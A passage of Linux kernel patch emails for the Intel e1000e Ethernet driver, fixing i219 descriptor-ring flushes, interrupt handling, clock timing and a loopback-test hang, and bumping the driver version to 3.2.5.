Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/netdev.c | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 76b1a9077fe1..14ee6a67ee73 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -4043,6 +4043,8 @@ void e1000e_reset(struct e1000_adapter *adapter) } } + if (hw->mac.type == e1000_pch_spt) + e1000_flush_desc_rings(adapter); /* Allow time for pending master requests to run */ mac->ops.reset_hw(hw); @@ -4215,10 +4217,6 @@ void e1000e_down(struct e1000_adapter *adapter, bool reset) spin_unlock(&adapter->stats64_lock); e1000e_flush_descriptors(adapter); - if (hw->mac.type == e1000_pch_spt) - e1000_flush_desc_rings(adapter); - e1000_clean_tx_ring(adapter->tx_ring); - e1000_clean_rx_ring(adapter->rx_ring); adapter->link_speed = 0; adapter->link_duplex = 0; @@ -4229,8 +4227,14 @@ void e1000e_down(struct e1000_adapter *adapter, bool reset) e1000_lv_jumbo_workaround_ich8lan(hw, false)) e_dbg("failed to disable jumbo frame workaround mode\n"); - if (reset && !pci_channel_offline(adapter->pdev)) - e1000e_reset(adapter); + if (!pci_channel_offline(adapter->pdev)) { + if (reset) + e1000e_reset(adapter); + else if (hw->mac.type == e1000_pch_spt) + e1000_flush_desc_rings(adapter); + } + e1000_clean_tx_ring(adapter->tx_ring); + e1000_clean_rx_ring(adapter->rx_ring); } void e1000e_reinit_locked(struct e1000_adapter *adapter) From bfc9473bf90457bf31d3f675d82234897c6480cd Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Wed, 22 Apr 2015 05:55:43 +0300 Subject: [PATCH 648/872] e1000e: remove call to do_div and sign mismatch warning Fixes a warning that was reported by Yanjiang Jin by implementing the solution suggested by Alexander Duyck . Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ich8lan.c | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.c b/drivers/net/ethernet/intel/e1000e/ich8lan.c index e18443a00bdb..d9f7b934b516 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.c +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.c @@ -1014,7 +1014,6 @@ static s32 e1000_platform_pm_pch_lpt(struct e1000_hw *hw, bool link) u16 speed, duplex, scale = 0; u16 max_snoop, max_nosnoop; u16 max_ltr_enc; /* max LTR latency encoded */ - s64 lat_ns; /* latency (ns) */ u64 value; u32 rxa; @@ -1040,14 +1039,10 @@ static s32 e1000_platform_pm_pch_lpt(struct e1000_hw *hw, bool link) * 2^25*(2^10-1) ns. The scale is encoded as 0=2^0ns, * 1=2^5ns, 2=2^10ns,...5=2^25ns. */ - lat_ns = ((s64)rxa * 1024 - - (2 * (s64)hw->adapter->max_frame_size)) * 8 * 1000; - if (lat_ns < 0) { - value = 0; - } else { - value = lat_ns; - do_div(value, speed); - } + rxa *= 512; + value = (rxa > hw->adapter->max_frame_size) ? + (rxa - hw->adapter->max_frame_size) * (16000 / speed) : + 0; while (value > PCI_LTR_VALUE_MASK) { scale++; From 95f0d950467f1228d4e326c11150e1750a6dd1ef Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Wed, 22 Apr 2015 19:25:17 +0300 Subject: [PATCH 649/872] e1000e: fix logical error in flush_desc_rings The condition under which the flush should occur was reversed. The fix should be applied before any HW reset (unless followed by bus reset) and before any power state transition from D0. 
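In code terms, the corrected early return (the full hunk follows below) only proceeds with the flush when both conditions hold:

    /* nothing to do unless the flush-needed bit is set AND the Tx ring is
     * configured (TDLEN != 0)
     */
    if (!(hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || !tdlen)
            return;
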
If E1000_FEXTNVM7_NEED_DESCRING_FLUSH bit is set in FEXTNVM7 and TDLEN > 0 the Tx ring should be flushed. (fixes ~95% of the hang states). If the E1000_FEXTNVM7_NEED_DESCRING_FLUSH did not clear, we should also flush the RX ring. Bug was caught by Alexander Duyck during a code review when examining this fix. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/netdev.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 14ee6a67ee73..b2d77a5c25c0 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3878,7 +3878,7 @@ static void e1000_flush_desc_rings(struct e1000_adapter *adapter) /* do nothing if we're not in faulty state, or if the queue is empty */ tdlen = er32(TDLEN(0)); hang_state = er32(FEXTNVM7); - if ((hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || tdlen) + if (!(hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || !tdlen) return; e1000_flush_tx_ring(adapter); /* recheck, maybe the fault is caused by the rx ring */ From ff9174291eddb3f42a1e9429f8b919bebc33533b Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:38 +0300 Subject: [PATCH 650/872] e1000e: fix flush_desc_ring implementation The indication that a descriptor ring flush is required was read from FEXTNVM7 by mistake. It should be read from the PCI config space. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/e1000.h | 2 ++ drivers/net/ethernet/intel/e1000e/ich8lan.h | 1 - drivers/net/ethernet/intel/e1000e/netdev.c | 12 +++++++----- 3 files changed, 9 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/e1000.h b/drivers/net/ethernet/intel/e1000e/e1000.h index 0abc942c966e..e78487ab18da 100644 --- a/drivers/net/ethernet/intel/e1000e/e1000.h +++ b/drivers/net/ethernet/intel/e1000e/e1000.h @@ -98,6 +98,8 @@ struct e1000_info; #define DEFAULT_RADV 8 #define BURST_RDTR 0x20 #define BURST_RADV 0x20 +#define PCICFG_DESC_RING_STATUS 0xe4 +#define FLUSH_DESC_REQUIRED 0x100 /* in the case of WTHRESH, it appears at least the 82571/2 hardware * writes back 4 descriptors when WTHRESH=5, and 3 descriptors when diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index bf72ef809df8..1500536a6748 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -100,7 +100,6 @@ #define E1000_FEXTNVM7_DISABLE_PB_READ 0x00040000 #define E1000_FEXTNVM7_DISABLE_SMB_PERST 0x00000020 -#define E1000_FEXTNVM7_NEED_DESCRING_FLUSH 0x00000100 #define E1000_FEXTNVM11_DISABLE_MULR_FIX 0x00002000 /* bit24: RXDCTL thresholds granularity: 0 - cache lines, 1 - descriptors */ diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index b2d77a5c25c0..4f029b6d0cf0 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3867,7 +3867,7 @@ static void e1000_flush_rx_ring(struct e1000_adapter *adapter) static void e1000_flush_desc_rings(struct e1000_adapter *adapter) { - u32 hang_state; + u16 hang_state; u32 fext_nvm11, tdlen; struct e1000_hw *hw = &adapter->hw; @@ -3877,13 +3877,15 @@ static void e1000_flush_desc_rings(struct e1000_adapter *adapter) ew32(FEXTNVM11, fext_nvm11); /* do nothing if we're not in faulty state, or if 
the queue is empty */ tdlen = er32(TDLEN(0)); - hang_state = er32(FEXTNVM7); - if (!(hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) || !tdlen) + pci_read_config_word(adapter->pdev, PCICFG_DESC_RING_STATUS, + &hang_state); + if (!(hang_state & FLUSH_DESC_REQUIRED) || !tdlen) return; e1000_flush_tx_ring(adapter); /* recheck, maybe the fault is caused by the rx ring */ - hang_state = er32(FEXTNVM7); - if (hang_state & E1000_FEXTNVM7_NEED_DESCRING_FLUSH) + pci_read_config_word(adapter->pdev, PCICFG_DESC_RING_STATUS, + &hang_state); + if (hang_state & FLUSH_DESC_REQUIRED) e1000_flush_rx_ring(adapter); } From ec945cfbbf918dd862d7574f9b75588ba1f4a729 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:42 +0300 Subject: [PATCH 651/872] e1000e: fix legacy interrupt handling in i219 This fix handles a hardware issue that prevented i219 from working in legacy interrupts mode (IntMode=0) Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ich8lan.h | 5 ++++- drivers/net/ethernet/intel/e1000e/netdev.c | 14 ++++++++++++++ drivers/net/ethernet/intel/e1000e/regs.h | 1 + 3 files changed, 19 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index 1500536a6748..193c445773fa 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -98,8 +98,11 @@ #define E1000_FEXTNVM6_K1_OFF_ENABLE 0x80000000 /* bit for disabling packet buffer read */ #define E1000_FEXTNVM7_DISABLE_PB_READ 0x00040000 - +#define E1000_FEXTNVM7_SIDE_CLK_UNGATE 0x00000004 #define E1000_FEXTNVM7_DISABLE_SMB_PERST 0x00000020 +#define E1000_FEXTNVM9_IOSFSB_CLKGATE_DIS 0x00000800 +#define E1000_FEXTNVM9_IOSFSB_CLKREQ_DIS 0x00001000 +#define E1000_FEXTNVM11_DISABLE_PB_READ 0x00000200 #define E1000_FEXTNVM11_DISABLE_MULR_FIX 0x00002000 /* bit24: RXDCTL thresholds granularity: 0 - cache lines, 1 - descriptors */ diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 4f029b6d0cf0..5f94fdf4af4e 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -4120,6 +4120,20 @@ void e1000e_reset(struct e1000_adapter *adapter) phy_data &= ~IGP02E1000_PM_SPD; e1e_wphy(hw, IGP02E1000_PHY_POWER_MGMT, phy_data); } + if (hw->mac.type == e1000_pch_spt && adapter->int_mode == 0) { + u32 reg; + + /* Fextnvm7 @ 0xe4[2] = 1 */ + reg = er32(FEXTNVM7); + reg |= E1000_FEXTNVM7_SIDE_CLK_UNGATE; + ew32(FEXTNVM7, reg); + /* Fextnvm9 @ 0x5bb4[13:12] = 11 */ + reg = er32(FEXTNVM9); + reg |= E1000_FEXTNVM9_IOSFSB_CLKGATE_DIS | + E1000_FEXTNVM9_IOSFSB_CLKREQ_DIS; + ew32(FEXTNVM9, reg); + } + } int e1000e_up(struct e1000_adapter *adapter) diff --git a/drivers/net/ethernet/intel/e1000e/regs.h b/drivers/net/ethernet/intel/e1000e/regs.h index 200a3126beed..110e27e35ff5 100644 --- a/drivers/net/ethernet/intel/e1000e/regs.h +++ b/drivers/net/ethernet/intel/e1000e/regs.h @@ -38,6 +38,7 @@ #define E1000_FEXTNVM4 0x00024 /* Future Extended NVM 4 - RW */ #define E1000_FEXTNVM6 0x00010 /* Future Extended NVM 6 - RW */ #define E1000_FEXTNVM7 0x000E4 /* Future Extended NVM 7 - RW */ +#define E1000_FEXTNVM9 0x5BB4 /* Future Extended NVM 9 - RW */ #define E1000_FEXTNVM11 0x5BBC /* Future Extended NVM 11 - RW */ #define E1000_PCIEANACFG 0x00F18 /* PCIE Analog Config */ #define E1000_FCT 0x00030 /* Flow Control Type - RW */ From 83129b37ef35bb6a7f01c060129736a8db5d31c4 Mon 
Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:45 +0300 Subject: [PATCH 652/872] e1000e: fix systim issues Two issues involving systim were reported. 1. Clock is not running in the correct frequency 2. In some situations, systim values were not incremented linearly This patch fixes the hardware clock configuration and the spurious non-linear increment. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/e1000.h | 4 +++ drivers/net/ethernet/intel/e1000e/netdev.c | 37 +++++++++++++++------- 2 files changed, 30 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/e1000.h b/drivers/net/ethernet/intel/e1000e/e1000.h index e78487ab18da..7d8a45c9a40c 100644 --- a/drivers/net/ethernet/intel/e1000e/e1000.h +++ b/drivers/net/ethernet/intel/e1000e/e1000.h @@ -386,6 +386,10 @@ s32 e1000e_get_base_timinca(struct e1000_adapter *adapter, u32 *timinca); #define INCVALUE_SHIFT_25MHz 18 #define INCPERIOD_25MHz 1 +#define INCVALUE_24MHz 125 +#define INCVALUE_SHIFT_24MHz 14 +#define INCPERIOD_24MHz 3 + /* Another drawback of scaling the incvalue by a large factor is the * 64-bit SYSTIM register overflows more quickly. This is dealt with * by simply reading the clock before it overflows. diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index 5f94fdf4af4e..b7035bc79e76 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -3525,22 +3525,30 @@ s32 e1000e_get_base_timinca(struct e1000_adapter *adapter, u32 *timinca) switch (hw->mac.type) { case e1000_pch2lan: case e1000_pch_lpt: - case e1000_pch_spt: - /* On I217, I218 and I219, the clock frequency is 25MHz - * or 96MHz as indicated by the System Clock Frequency - * Indication - */ - if (((hw->mac.type != e1000_pch_lpt) && - (hw->mac.type != e1000_pch_spt)) || - (er32(TSYNCRXCTL) & E1000_TSYNCRXCTL_SYSCFI)) { + if (er32(TSYNCRXCTL) & E1000_TSYNCRXCTL_SYSCFI) { /* Stable 96MHz frequency */ incperiod = INCPERIOD_96MHz; incvalue = INCVALUE_96MHz; shift = INCVALUE_SHIFT_96MHz; adapter->cc.shift = shift + INCPERIOD_SHIFT_96MHz; + } else { + /* Stable 25MHz frequency */ + incperiod = INCPERIOD_25MHz; + incvalue = INCVALUE_25MHz; + shift = INCVALUE_SHIFT_25MHz; + adapter->cc.shift = shift; + } + break; + case e1000_pch_spt: + if (er32(TSYNCRXCTL) & E1000_TSYNCRXCTL_SYSCFI) { + /* Stable 24MHz frequency */ + incperiod = INCPERIOD_24MHz; + incvalue = INCVALUE_24MHz; + shift = INCVALUE_SHIFT_24MHz; + adapter->cc.shift = shift; break; } - /* fall-through */ + return -EINVAL; case e1000_82574: case e1000_82583: /* Stable 25MHz frequency */ @@ -4273,9 +4281,16 @@ static cycle_t e1000e_cyclecounter_read(const struct cyclecounter *cc) cc); struct e1000_hw *hw = &adapter->hw; cycle_t systim, systim_next; + /* SYSTIMH latching upon SYSTIML read does not work well. To fix that + * we don't want to allow overflow of SYSTIML and a change to SYSTIMH + * to occur between reads, so if we read a vale close to overflow, we + * wait for overflow to occur and read both registers when its safe. 
+ */ + u32 systim_overflow_latch_fix = 0x3FFFFFFF; - /* latch SYSTIMH on read of SYSTIML */ - systim = (cycle_t)er32(SYSTIML); + do { + systim = (cycle_t)er32(SYSTIML); + } while (systim > systim_overflow_latch_fix); systim |= (cycle_t)er32(SYSTIMH) << 32; if ((hw->mac.type == e1000_82574) || (hw->mac.type == e1000_82583)) { From 2ec7d2974c5665780e5f2b532833b76531f0a8d3 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:47 +0300 Subject: [PATCH 653/872] e1000e: fix unit hang during loopback test System would hang during execution of "ethtool -t " for the same reason that required flushing the descriptor rings. This fix disables MULR for the loopback test to avoid the hang state. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ethtool.c | 27 ++++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/ethtool.c b/drivers/net/ethernet/intel/e1000e/ethtool.c index 11f486e4ff7b..c62f0db6dcb0 100644 --- a/drivers/net/ethernet/intel/e1000e/ethtool.c +++ b/drivers/net/ethernet/intel/e1000e/ethtool.c @@ -1516,8 +1516,19 @@ static int e1000_set_es2lan_mac_loopback(struct e1000_adapter *adapter) static int e1000_setup_loopback_test(struct e1000_adapter *adapter) { struct e1000_hw *hw = &adapter->hw; - u32 rctl; - + u32 rctl, fext_nvm11, tarc0; + + if (hw->mac.type == e1000_pch_spt) { + fext_nvm11 = er32(FEXTNVM11); + fext_nvm11 |= E1000_FEXTNVM11_DISABLE_MULR_FIX; + ew32(FEXTNVM11, fext_nvm11); + tarc0 = er32(TARC(0)); + /* clear bits 28 & 29 (control of MULR concurrent requests) */ + tarc0 &= 0xcfffffff; + /* set bit 29 (value of MULR requests is now 2) */ + tarc0 |= 0x20000000; + ew32(TARC(0), tarc0); + } if (hw->phy.media_type == e1000_media_type_fiber || hw->phy.media_type == e1000_media_type_internal_serdes) { switch (hw->mac.type) { @@ -1542,7 +1553,7 @@ static int e1000_setup_loopback_test(struct e1000_adapter *adapter) static void e1000_loopback_cleanup(struct e1000_adapter *adapter) { struct e1000_hw *hw = &adapter->hw; - u32 rctl; + u32 rctl, fext_nvm11, tarc0; u16 phy_reg; rctl = er32(RCTL); @@ -1550,6 +1561,16 @@ static void e1000_loopback_cleanup(struct e1000_adapter *adapter) ew32(RCTL, rctl); switch (hw->mac.type) { + case e1000_pch_spt: + fext_nvm11 = er32(FEXTNVM11); + fext_nvm11 &= ~E1000_FEXTNVM11_DISABLE_MULR_FIX; + ew32(FEXTNVM11, fext_nvm11); + tarc0 = er32(TARC(0)); + /* clear bits 28 & 29 (control of MULR concurrent requests) */ + /* set bit 29 (value of MULR requests is now 0) */ + tarc0 &= 0xcfffffff; + ew32(TARC(0), tarc0); + /* fall through */ case e1000_80003es2lan: if (hw->phy.media_type == e1000_media_type_fiber || hw->phy.media_type == e1000_media_type_internal_serdes) { From 529498cde04537211cc3aa8f920c371b91c0f7d8 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:50 +0300 Subject: [PATCH 654/872] e1000e: Bump the version to 3.2.5 Bump the version to reflect the driver changes and bug fixes for i219. Also update the copyright, while we are at it. 
Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/80003es2lan.c | 2 +- drivers/net/ethernet/intel/e1000e/80003es2lan.h | 2 +- drivers/net/ethernet/intel/e1000e/82571.c | 2 +- drivers/net/ethernet/intel/e1000e/82571.h | 2 +- drivers/net/ethernet/intel/e1000e/defines.h | 2 +- drivers/net/ethernet/intel/e1000e/e1000.h | 2 +- drivers/net/ethernet/intel/e1000e/ethtool.c | 2 +- drivers/net/ethernet/intel/e1000e/hw.h | 2 +- drivers/net/ethernet/intel/e1000e/ich8lan.c | 2 +- drivers/net/ethernet/intel/e1000e/ich8lan.h | 2 +- drivers/net/ethernet/intel/e1000e/mac.c | 2 +- drivers/net/ethernet/intel/e1000e/mac.h | 2 +- drivers/net/ethernet/intel/e1000e/manage.c | 2 +- drivers/net/ethernet/intel/e1000e/manage.h | 2 +- drivers/net/ethernet/intel/e1000e/netdev.c | 6 +++--- drivers/net/ethernet/intel/e1000e/nvm.c | 2 +- drivers/net/ethernet/intel/e1000e/nvm.h | 2 +- drivers/net/ethernet/intel/e1000e/param.c | 2 +- drivers/net/ethernet/intel/e1000e/phy.c | 2 +- drivers/net/ethernet/intel/e1000e/phy.h | 2 +- drivers/net/ethernet/intel/e1000e/ptp.c | 2 +- drivers/net/ethernet/intel/e1000e/regs.h | 2 +- 22 files changed, 24 insertions(+), 24 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/80003es2lan.c b/drivers/net/ethernet/intel/e1000e/80003es2lan.c index 08f22f348800..2af603f3e418 100644 --- a/drivers/net/ethernet/intel/e1000e/80003es2lan.c +++ b/drivers/net/ethernet/intel/e1000e/80003es2lan.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/80003es2lan.h b/drivers/net/ethernet/intel/e1000e/80003es2lan.h index 535a9430976d..a2162e11673e 100644 --- a/drivers/net/ethernet/intel/e1000e/80003es2lan.h +++ b/drivers/net/ethernet/intel/e1000e/80003es2lan.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/82571.c b/drivers/net/ethernet/intel/e1000e/82571.c index 32e77755a9c6..5f7016442ec4 100644 --- a/drivers/net/ethernet/intel/e1000e/82571.c +++ b/drivers/net/ethernet/intel/e1000e/82571.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/82571.h b/drivers/net/ethernet/intel/e1000e/82571.h index 2e758f796d60..abc6a9abff98 100644 --- a/drivers/net/ethernet/intel/e1000e/82571.h +++ b/drivers/net/ethernet/intel/e1000e/82571.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. 
* * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/defines.h b/drivers/net/ethernet/intel/e1000e/defines.h index 0570c668ec3d..133d4074dbe4 100644 --- a/drivers/net/ethernet/intel/e1000e/defines.h +++ b/drivers/net/ethernet/intel/e1000e/defines.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/e1000.h b/drivers/net/ethernet/intel/e1000e/e1000.h index 7d8a45c9a40c..0b748d1959d9 100644 --- a/drivers/net/ethernet/intel/e1000e/e1000.h +++ b/drivers/net/ethernet/intel/e1000e/e1000.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ethtool.c b/drivers/net/ethernet/intel/e1000e/ethtool.c index c62f0db6dcb0..ad6daa656d3e 100644 --- a/drivers/net/ethernet/intel/e1000e/ethtool.c +++ b/drivers/net/ethernet/intel/e1000e/ethtool.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/hw.h b/drivers/net/ethernet/intel/e1000e/hw.h index 19e8c487db06..c9da4654e9ca 100644 --- a/drivers/net/ethernet/intel/e1000e/hw.h +++ b/drivers/net/ethernet/intel/e1000e/hw.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.c b/drivers/net/ethernet/intel/e1000e/ich8lan.c index d9f7b934b516..b074b9a667b3 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.c +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index 193c445773fa..26459853c6be 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. 
* * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/mac.c b/drivers/net/ethernet/intel/e1000e/mac.c index 30b74d590bee..e59d7c283cd4 100644 --- a/drivers/net/ethernet/intel/e1000e/mac.c +++ b/drivers/net/ethernet/intel/e1000e/mac.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/mac.h b/drivers/net/ethernet/intel/e1000e/mac.h index 0513d90cdeea..8284618af9ff 100644 --- a/drivers/net/ethernet/intel/e1000e/mac.h +++ b/drivers/net/ethernet/intel/e1000e/mac.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/manage.c b/drivers/net/ethernet/intel/e1000e/manage.c index 06edfca1a35e..cc9b3befc2bc 100644 --- a/drivers/net/ethernet/intel/e1000e/manage.c +++ b/drivers/net/ethernet/intel/e1000e/manage.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/manage.h b/drivers/net/ethernet/intel/e1000e/manage.h index a8c27f98f7b0..0b9ea5952b07 100644 --- a/drivers/net/ethernet/intel/e1000e/manage.h +++ b/drivers/net/ethernet/intel/e1000e/manage.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index b7035bc79e76..e62b9dcb91fe 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. 
* * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, @@ -48,7 +48,7 @@ #define DRV_EXTRAVERSION "-k" -#define DRV_VERSION "2.3.2" DRV_EXTRAVERSION +#define DRV_VERSION "3.2.5" DRV_EXTRAVERSION char e1000e_driver_name[] = "e1000e"; const char e1000e_driver_version[] = DRV_VERSION; @@ -7438,7 +7438,7 @@ static int __init e1000_init_module(void) pr_info("Intel(R) PRO/1000 Network Driver - %s\n", e1000e_driver_version); - pr_info("Copyright(c) 1999 - 2014 Intel Corporation.\n"); + pr_info("Copyright(c) 1999 - 2015 Intel Corporation.\n"); ret = pci_register_driver(&e1000_driver); return ret; diff --git a/drivers/net/ethernet/intel/e1000e/nvm.c b/drivers/net/ethernet/intel/e1000e/nvm.c index fa6b1036a327..49f205c023bf 100644 --- a/drivers/net/ethernet/intel/e1000e/nvm.c +++ b/drivers/net/ethernet/intel/e1000e/nvm.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/nvm.h b/drivers/net/ethernet/intel/e1000e/nvm.h index 342bf69efab5..5d46967e0d1f 100644 --- a/drivers/net/ethernet/intel/e1000e/nvm.h +++ b/drivers/net/ethernet/intel/e1000e/nvm.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git 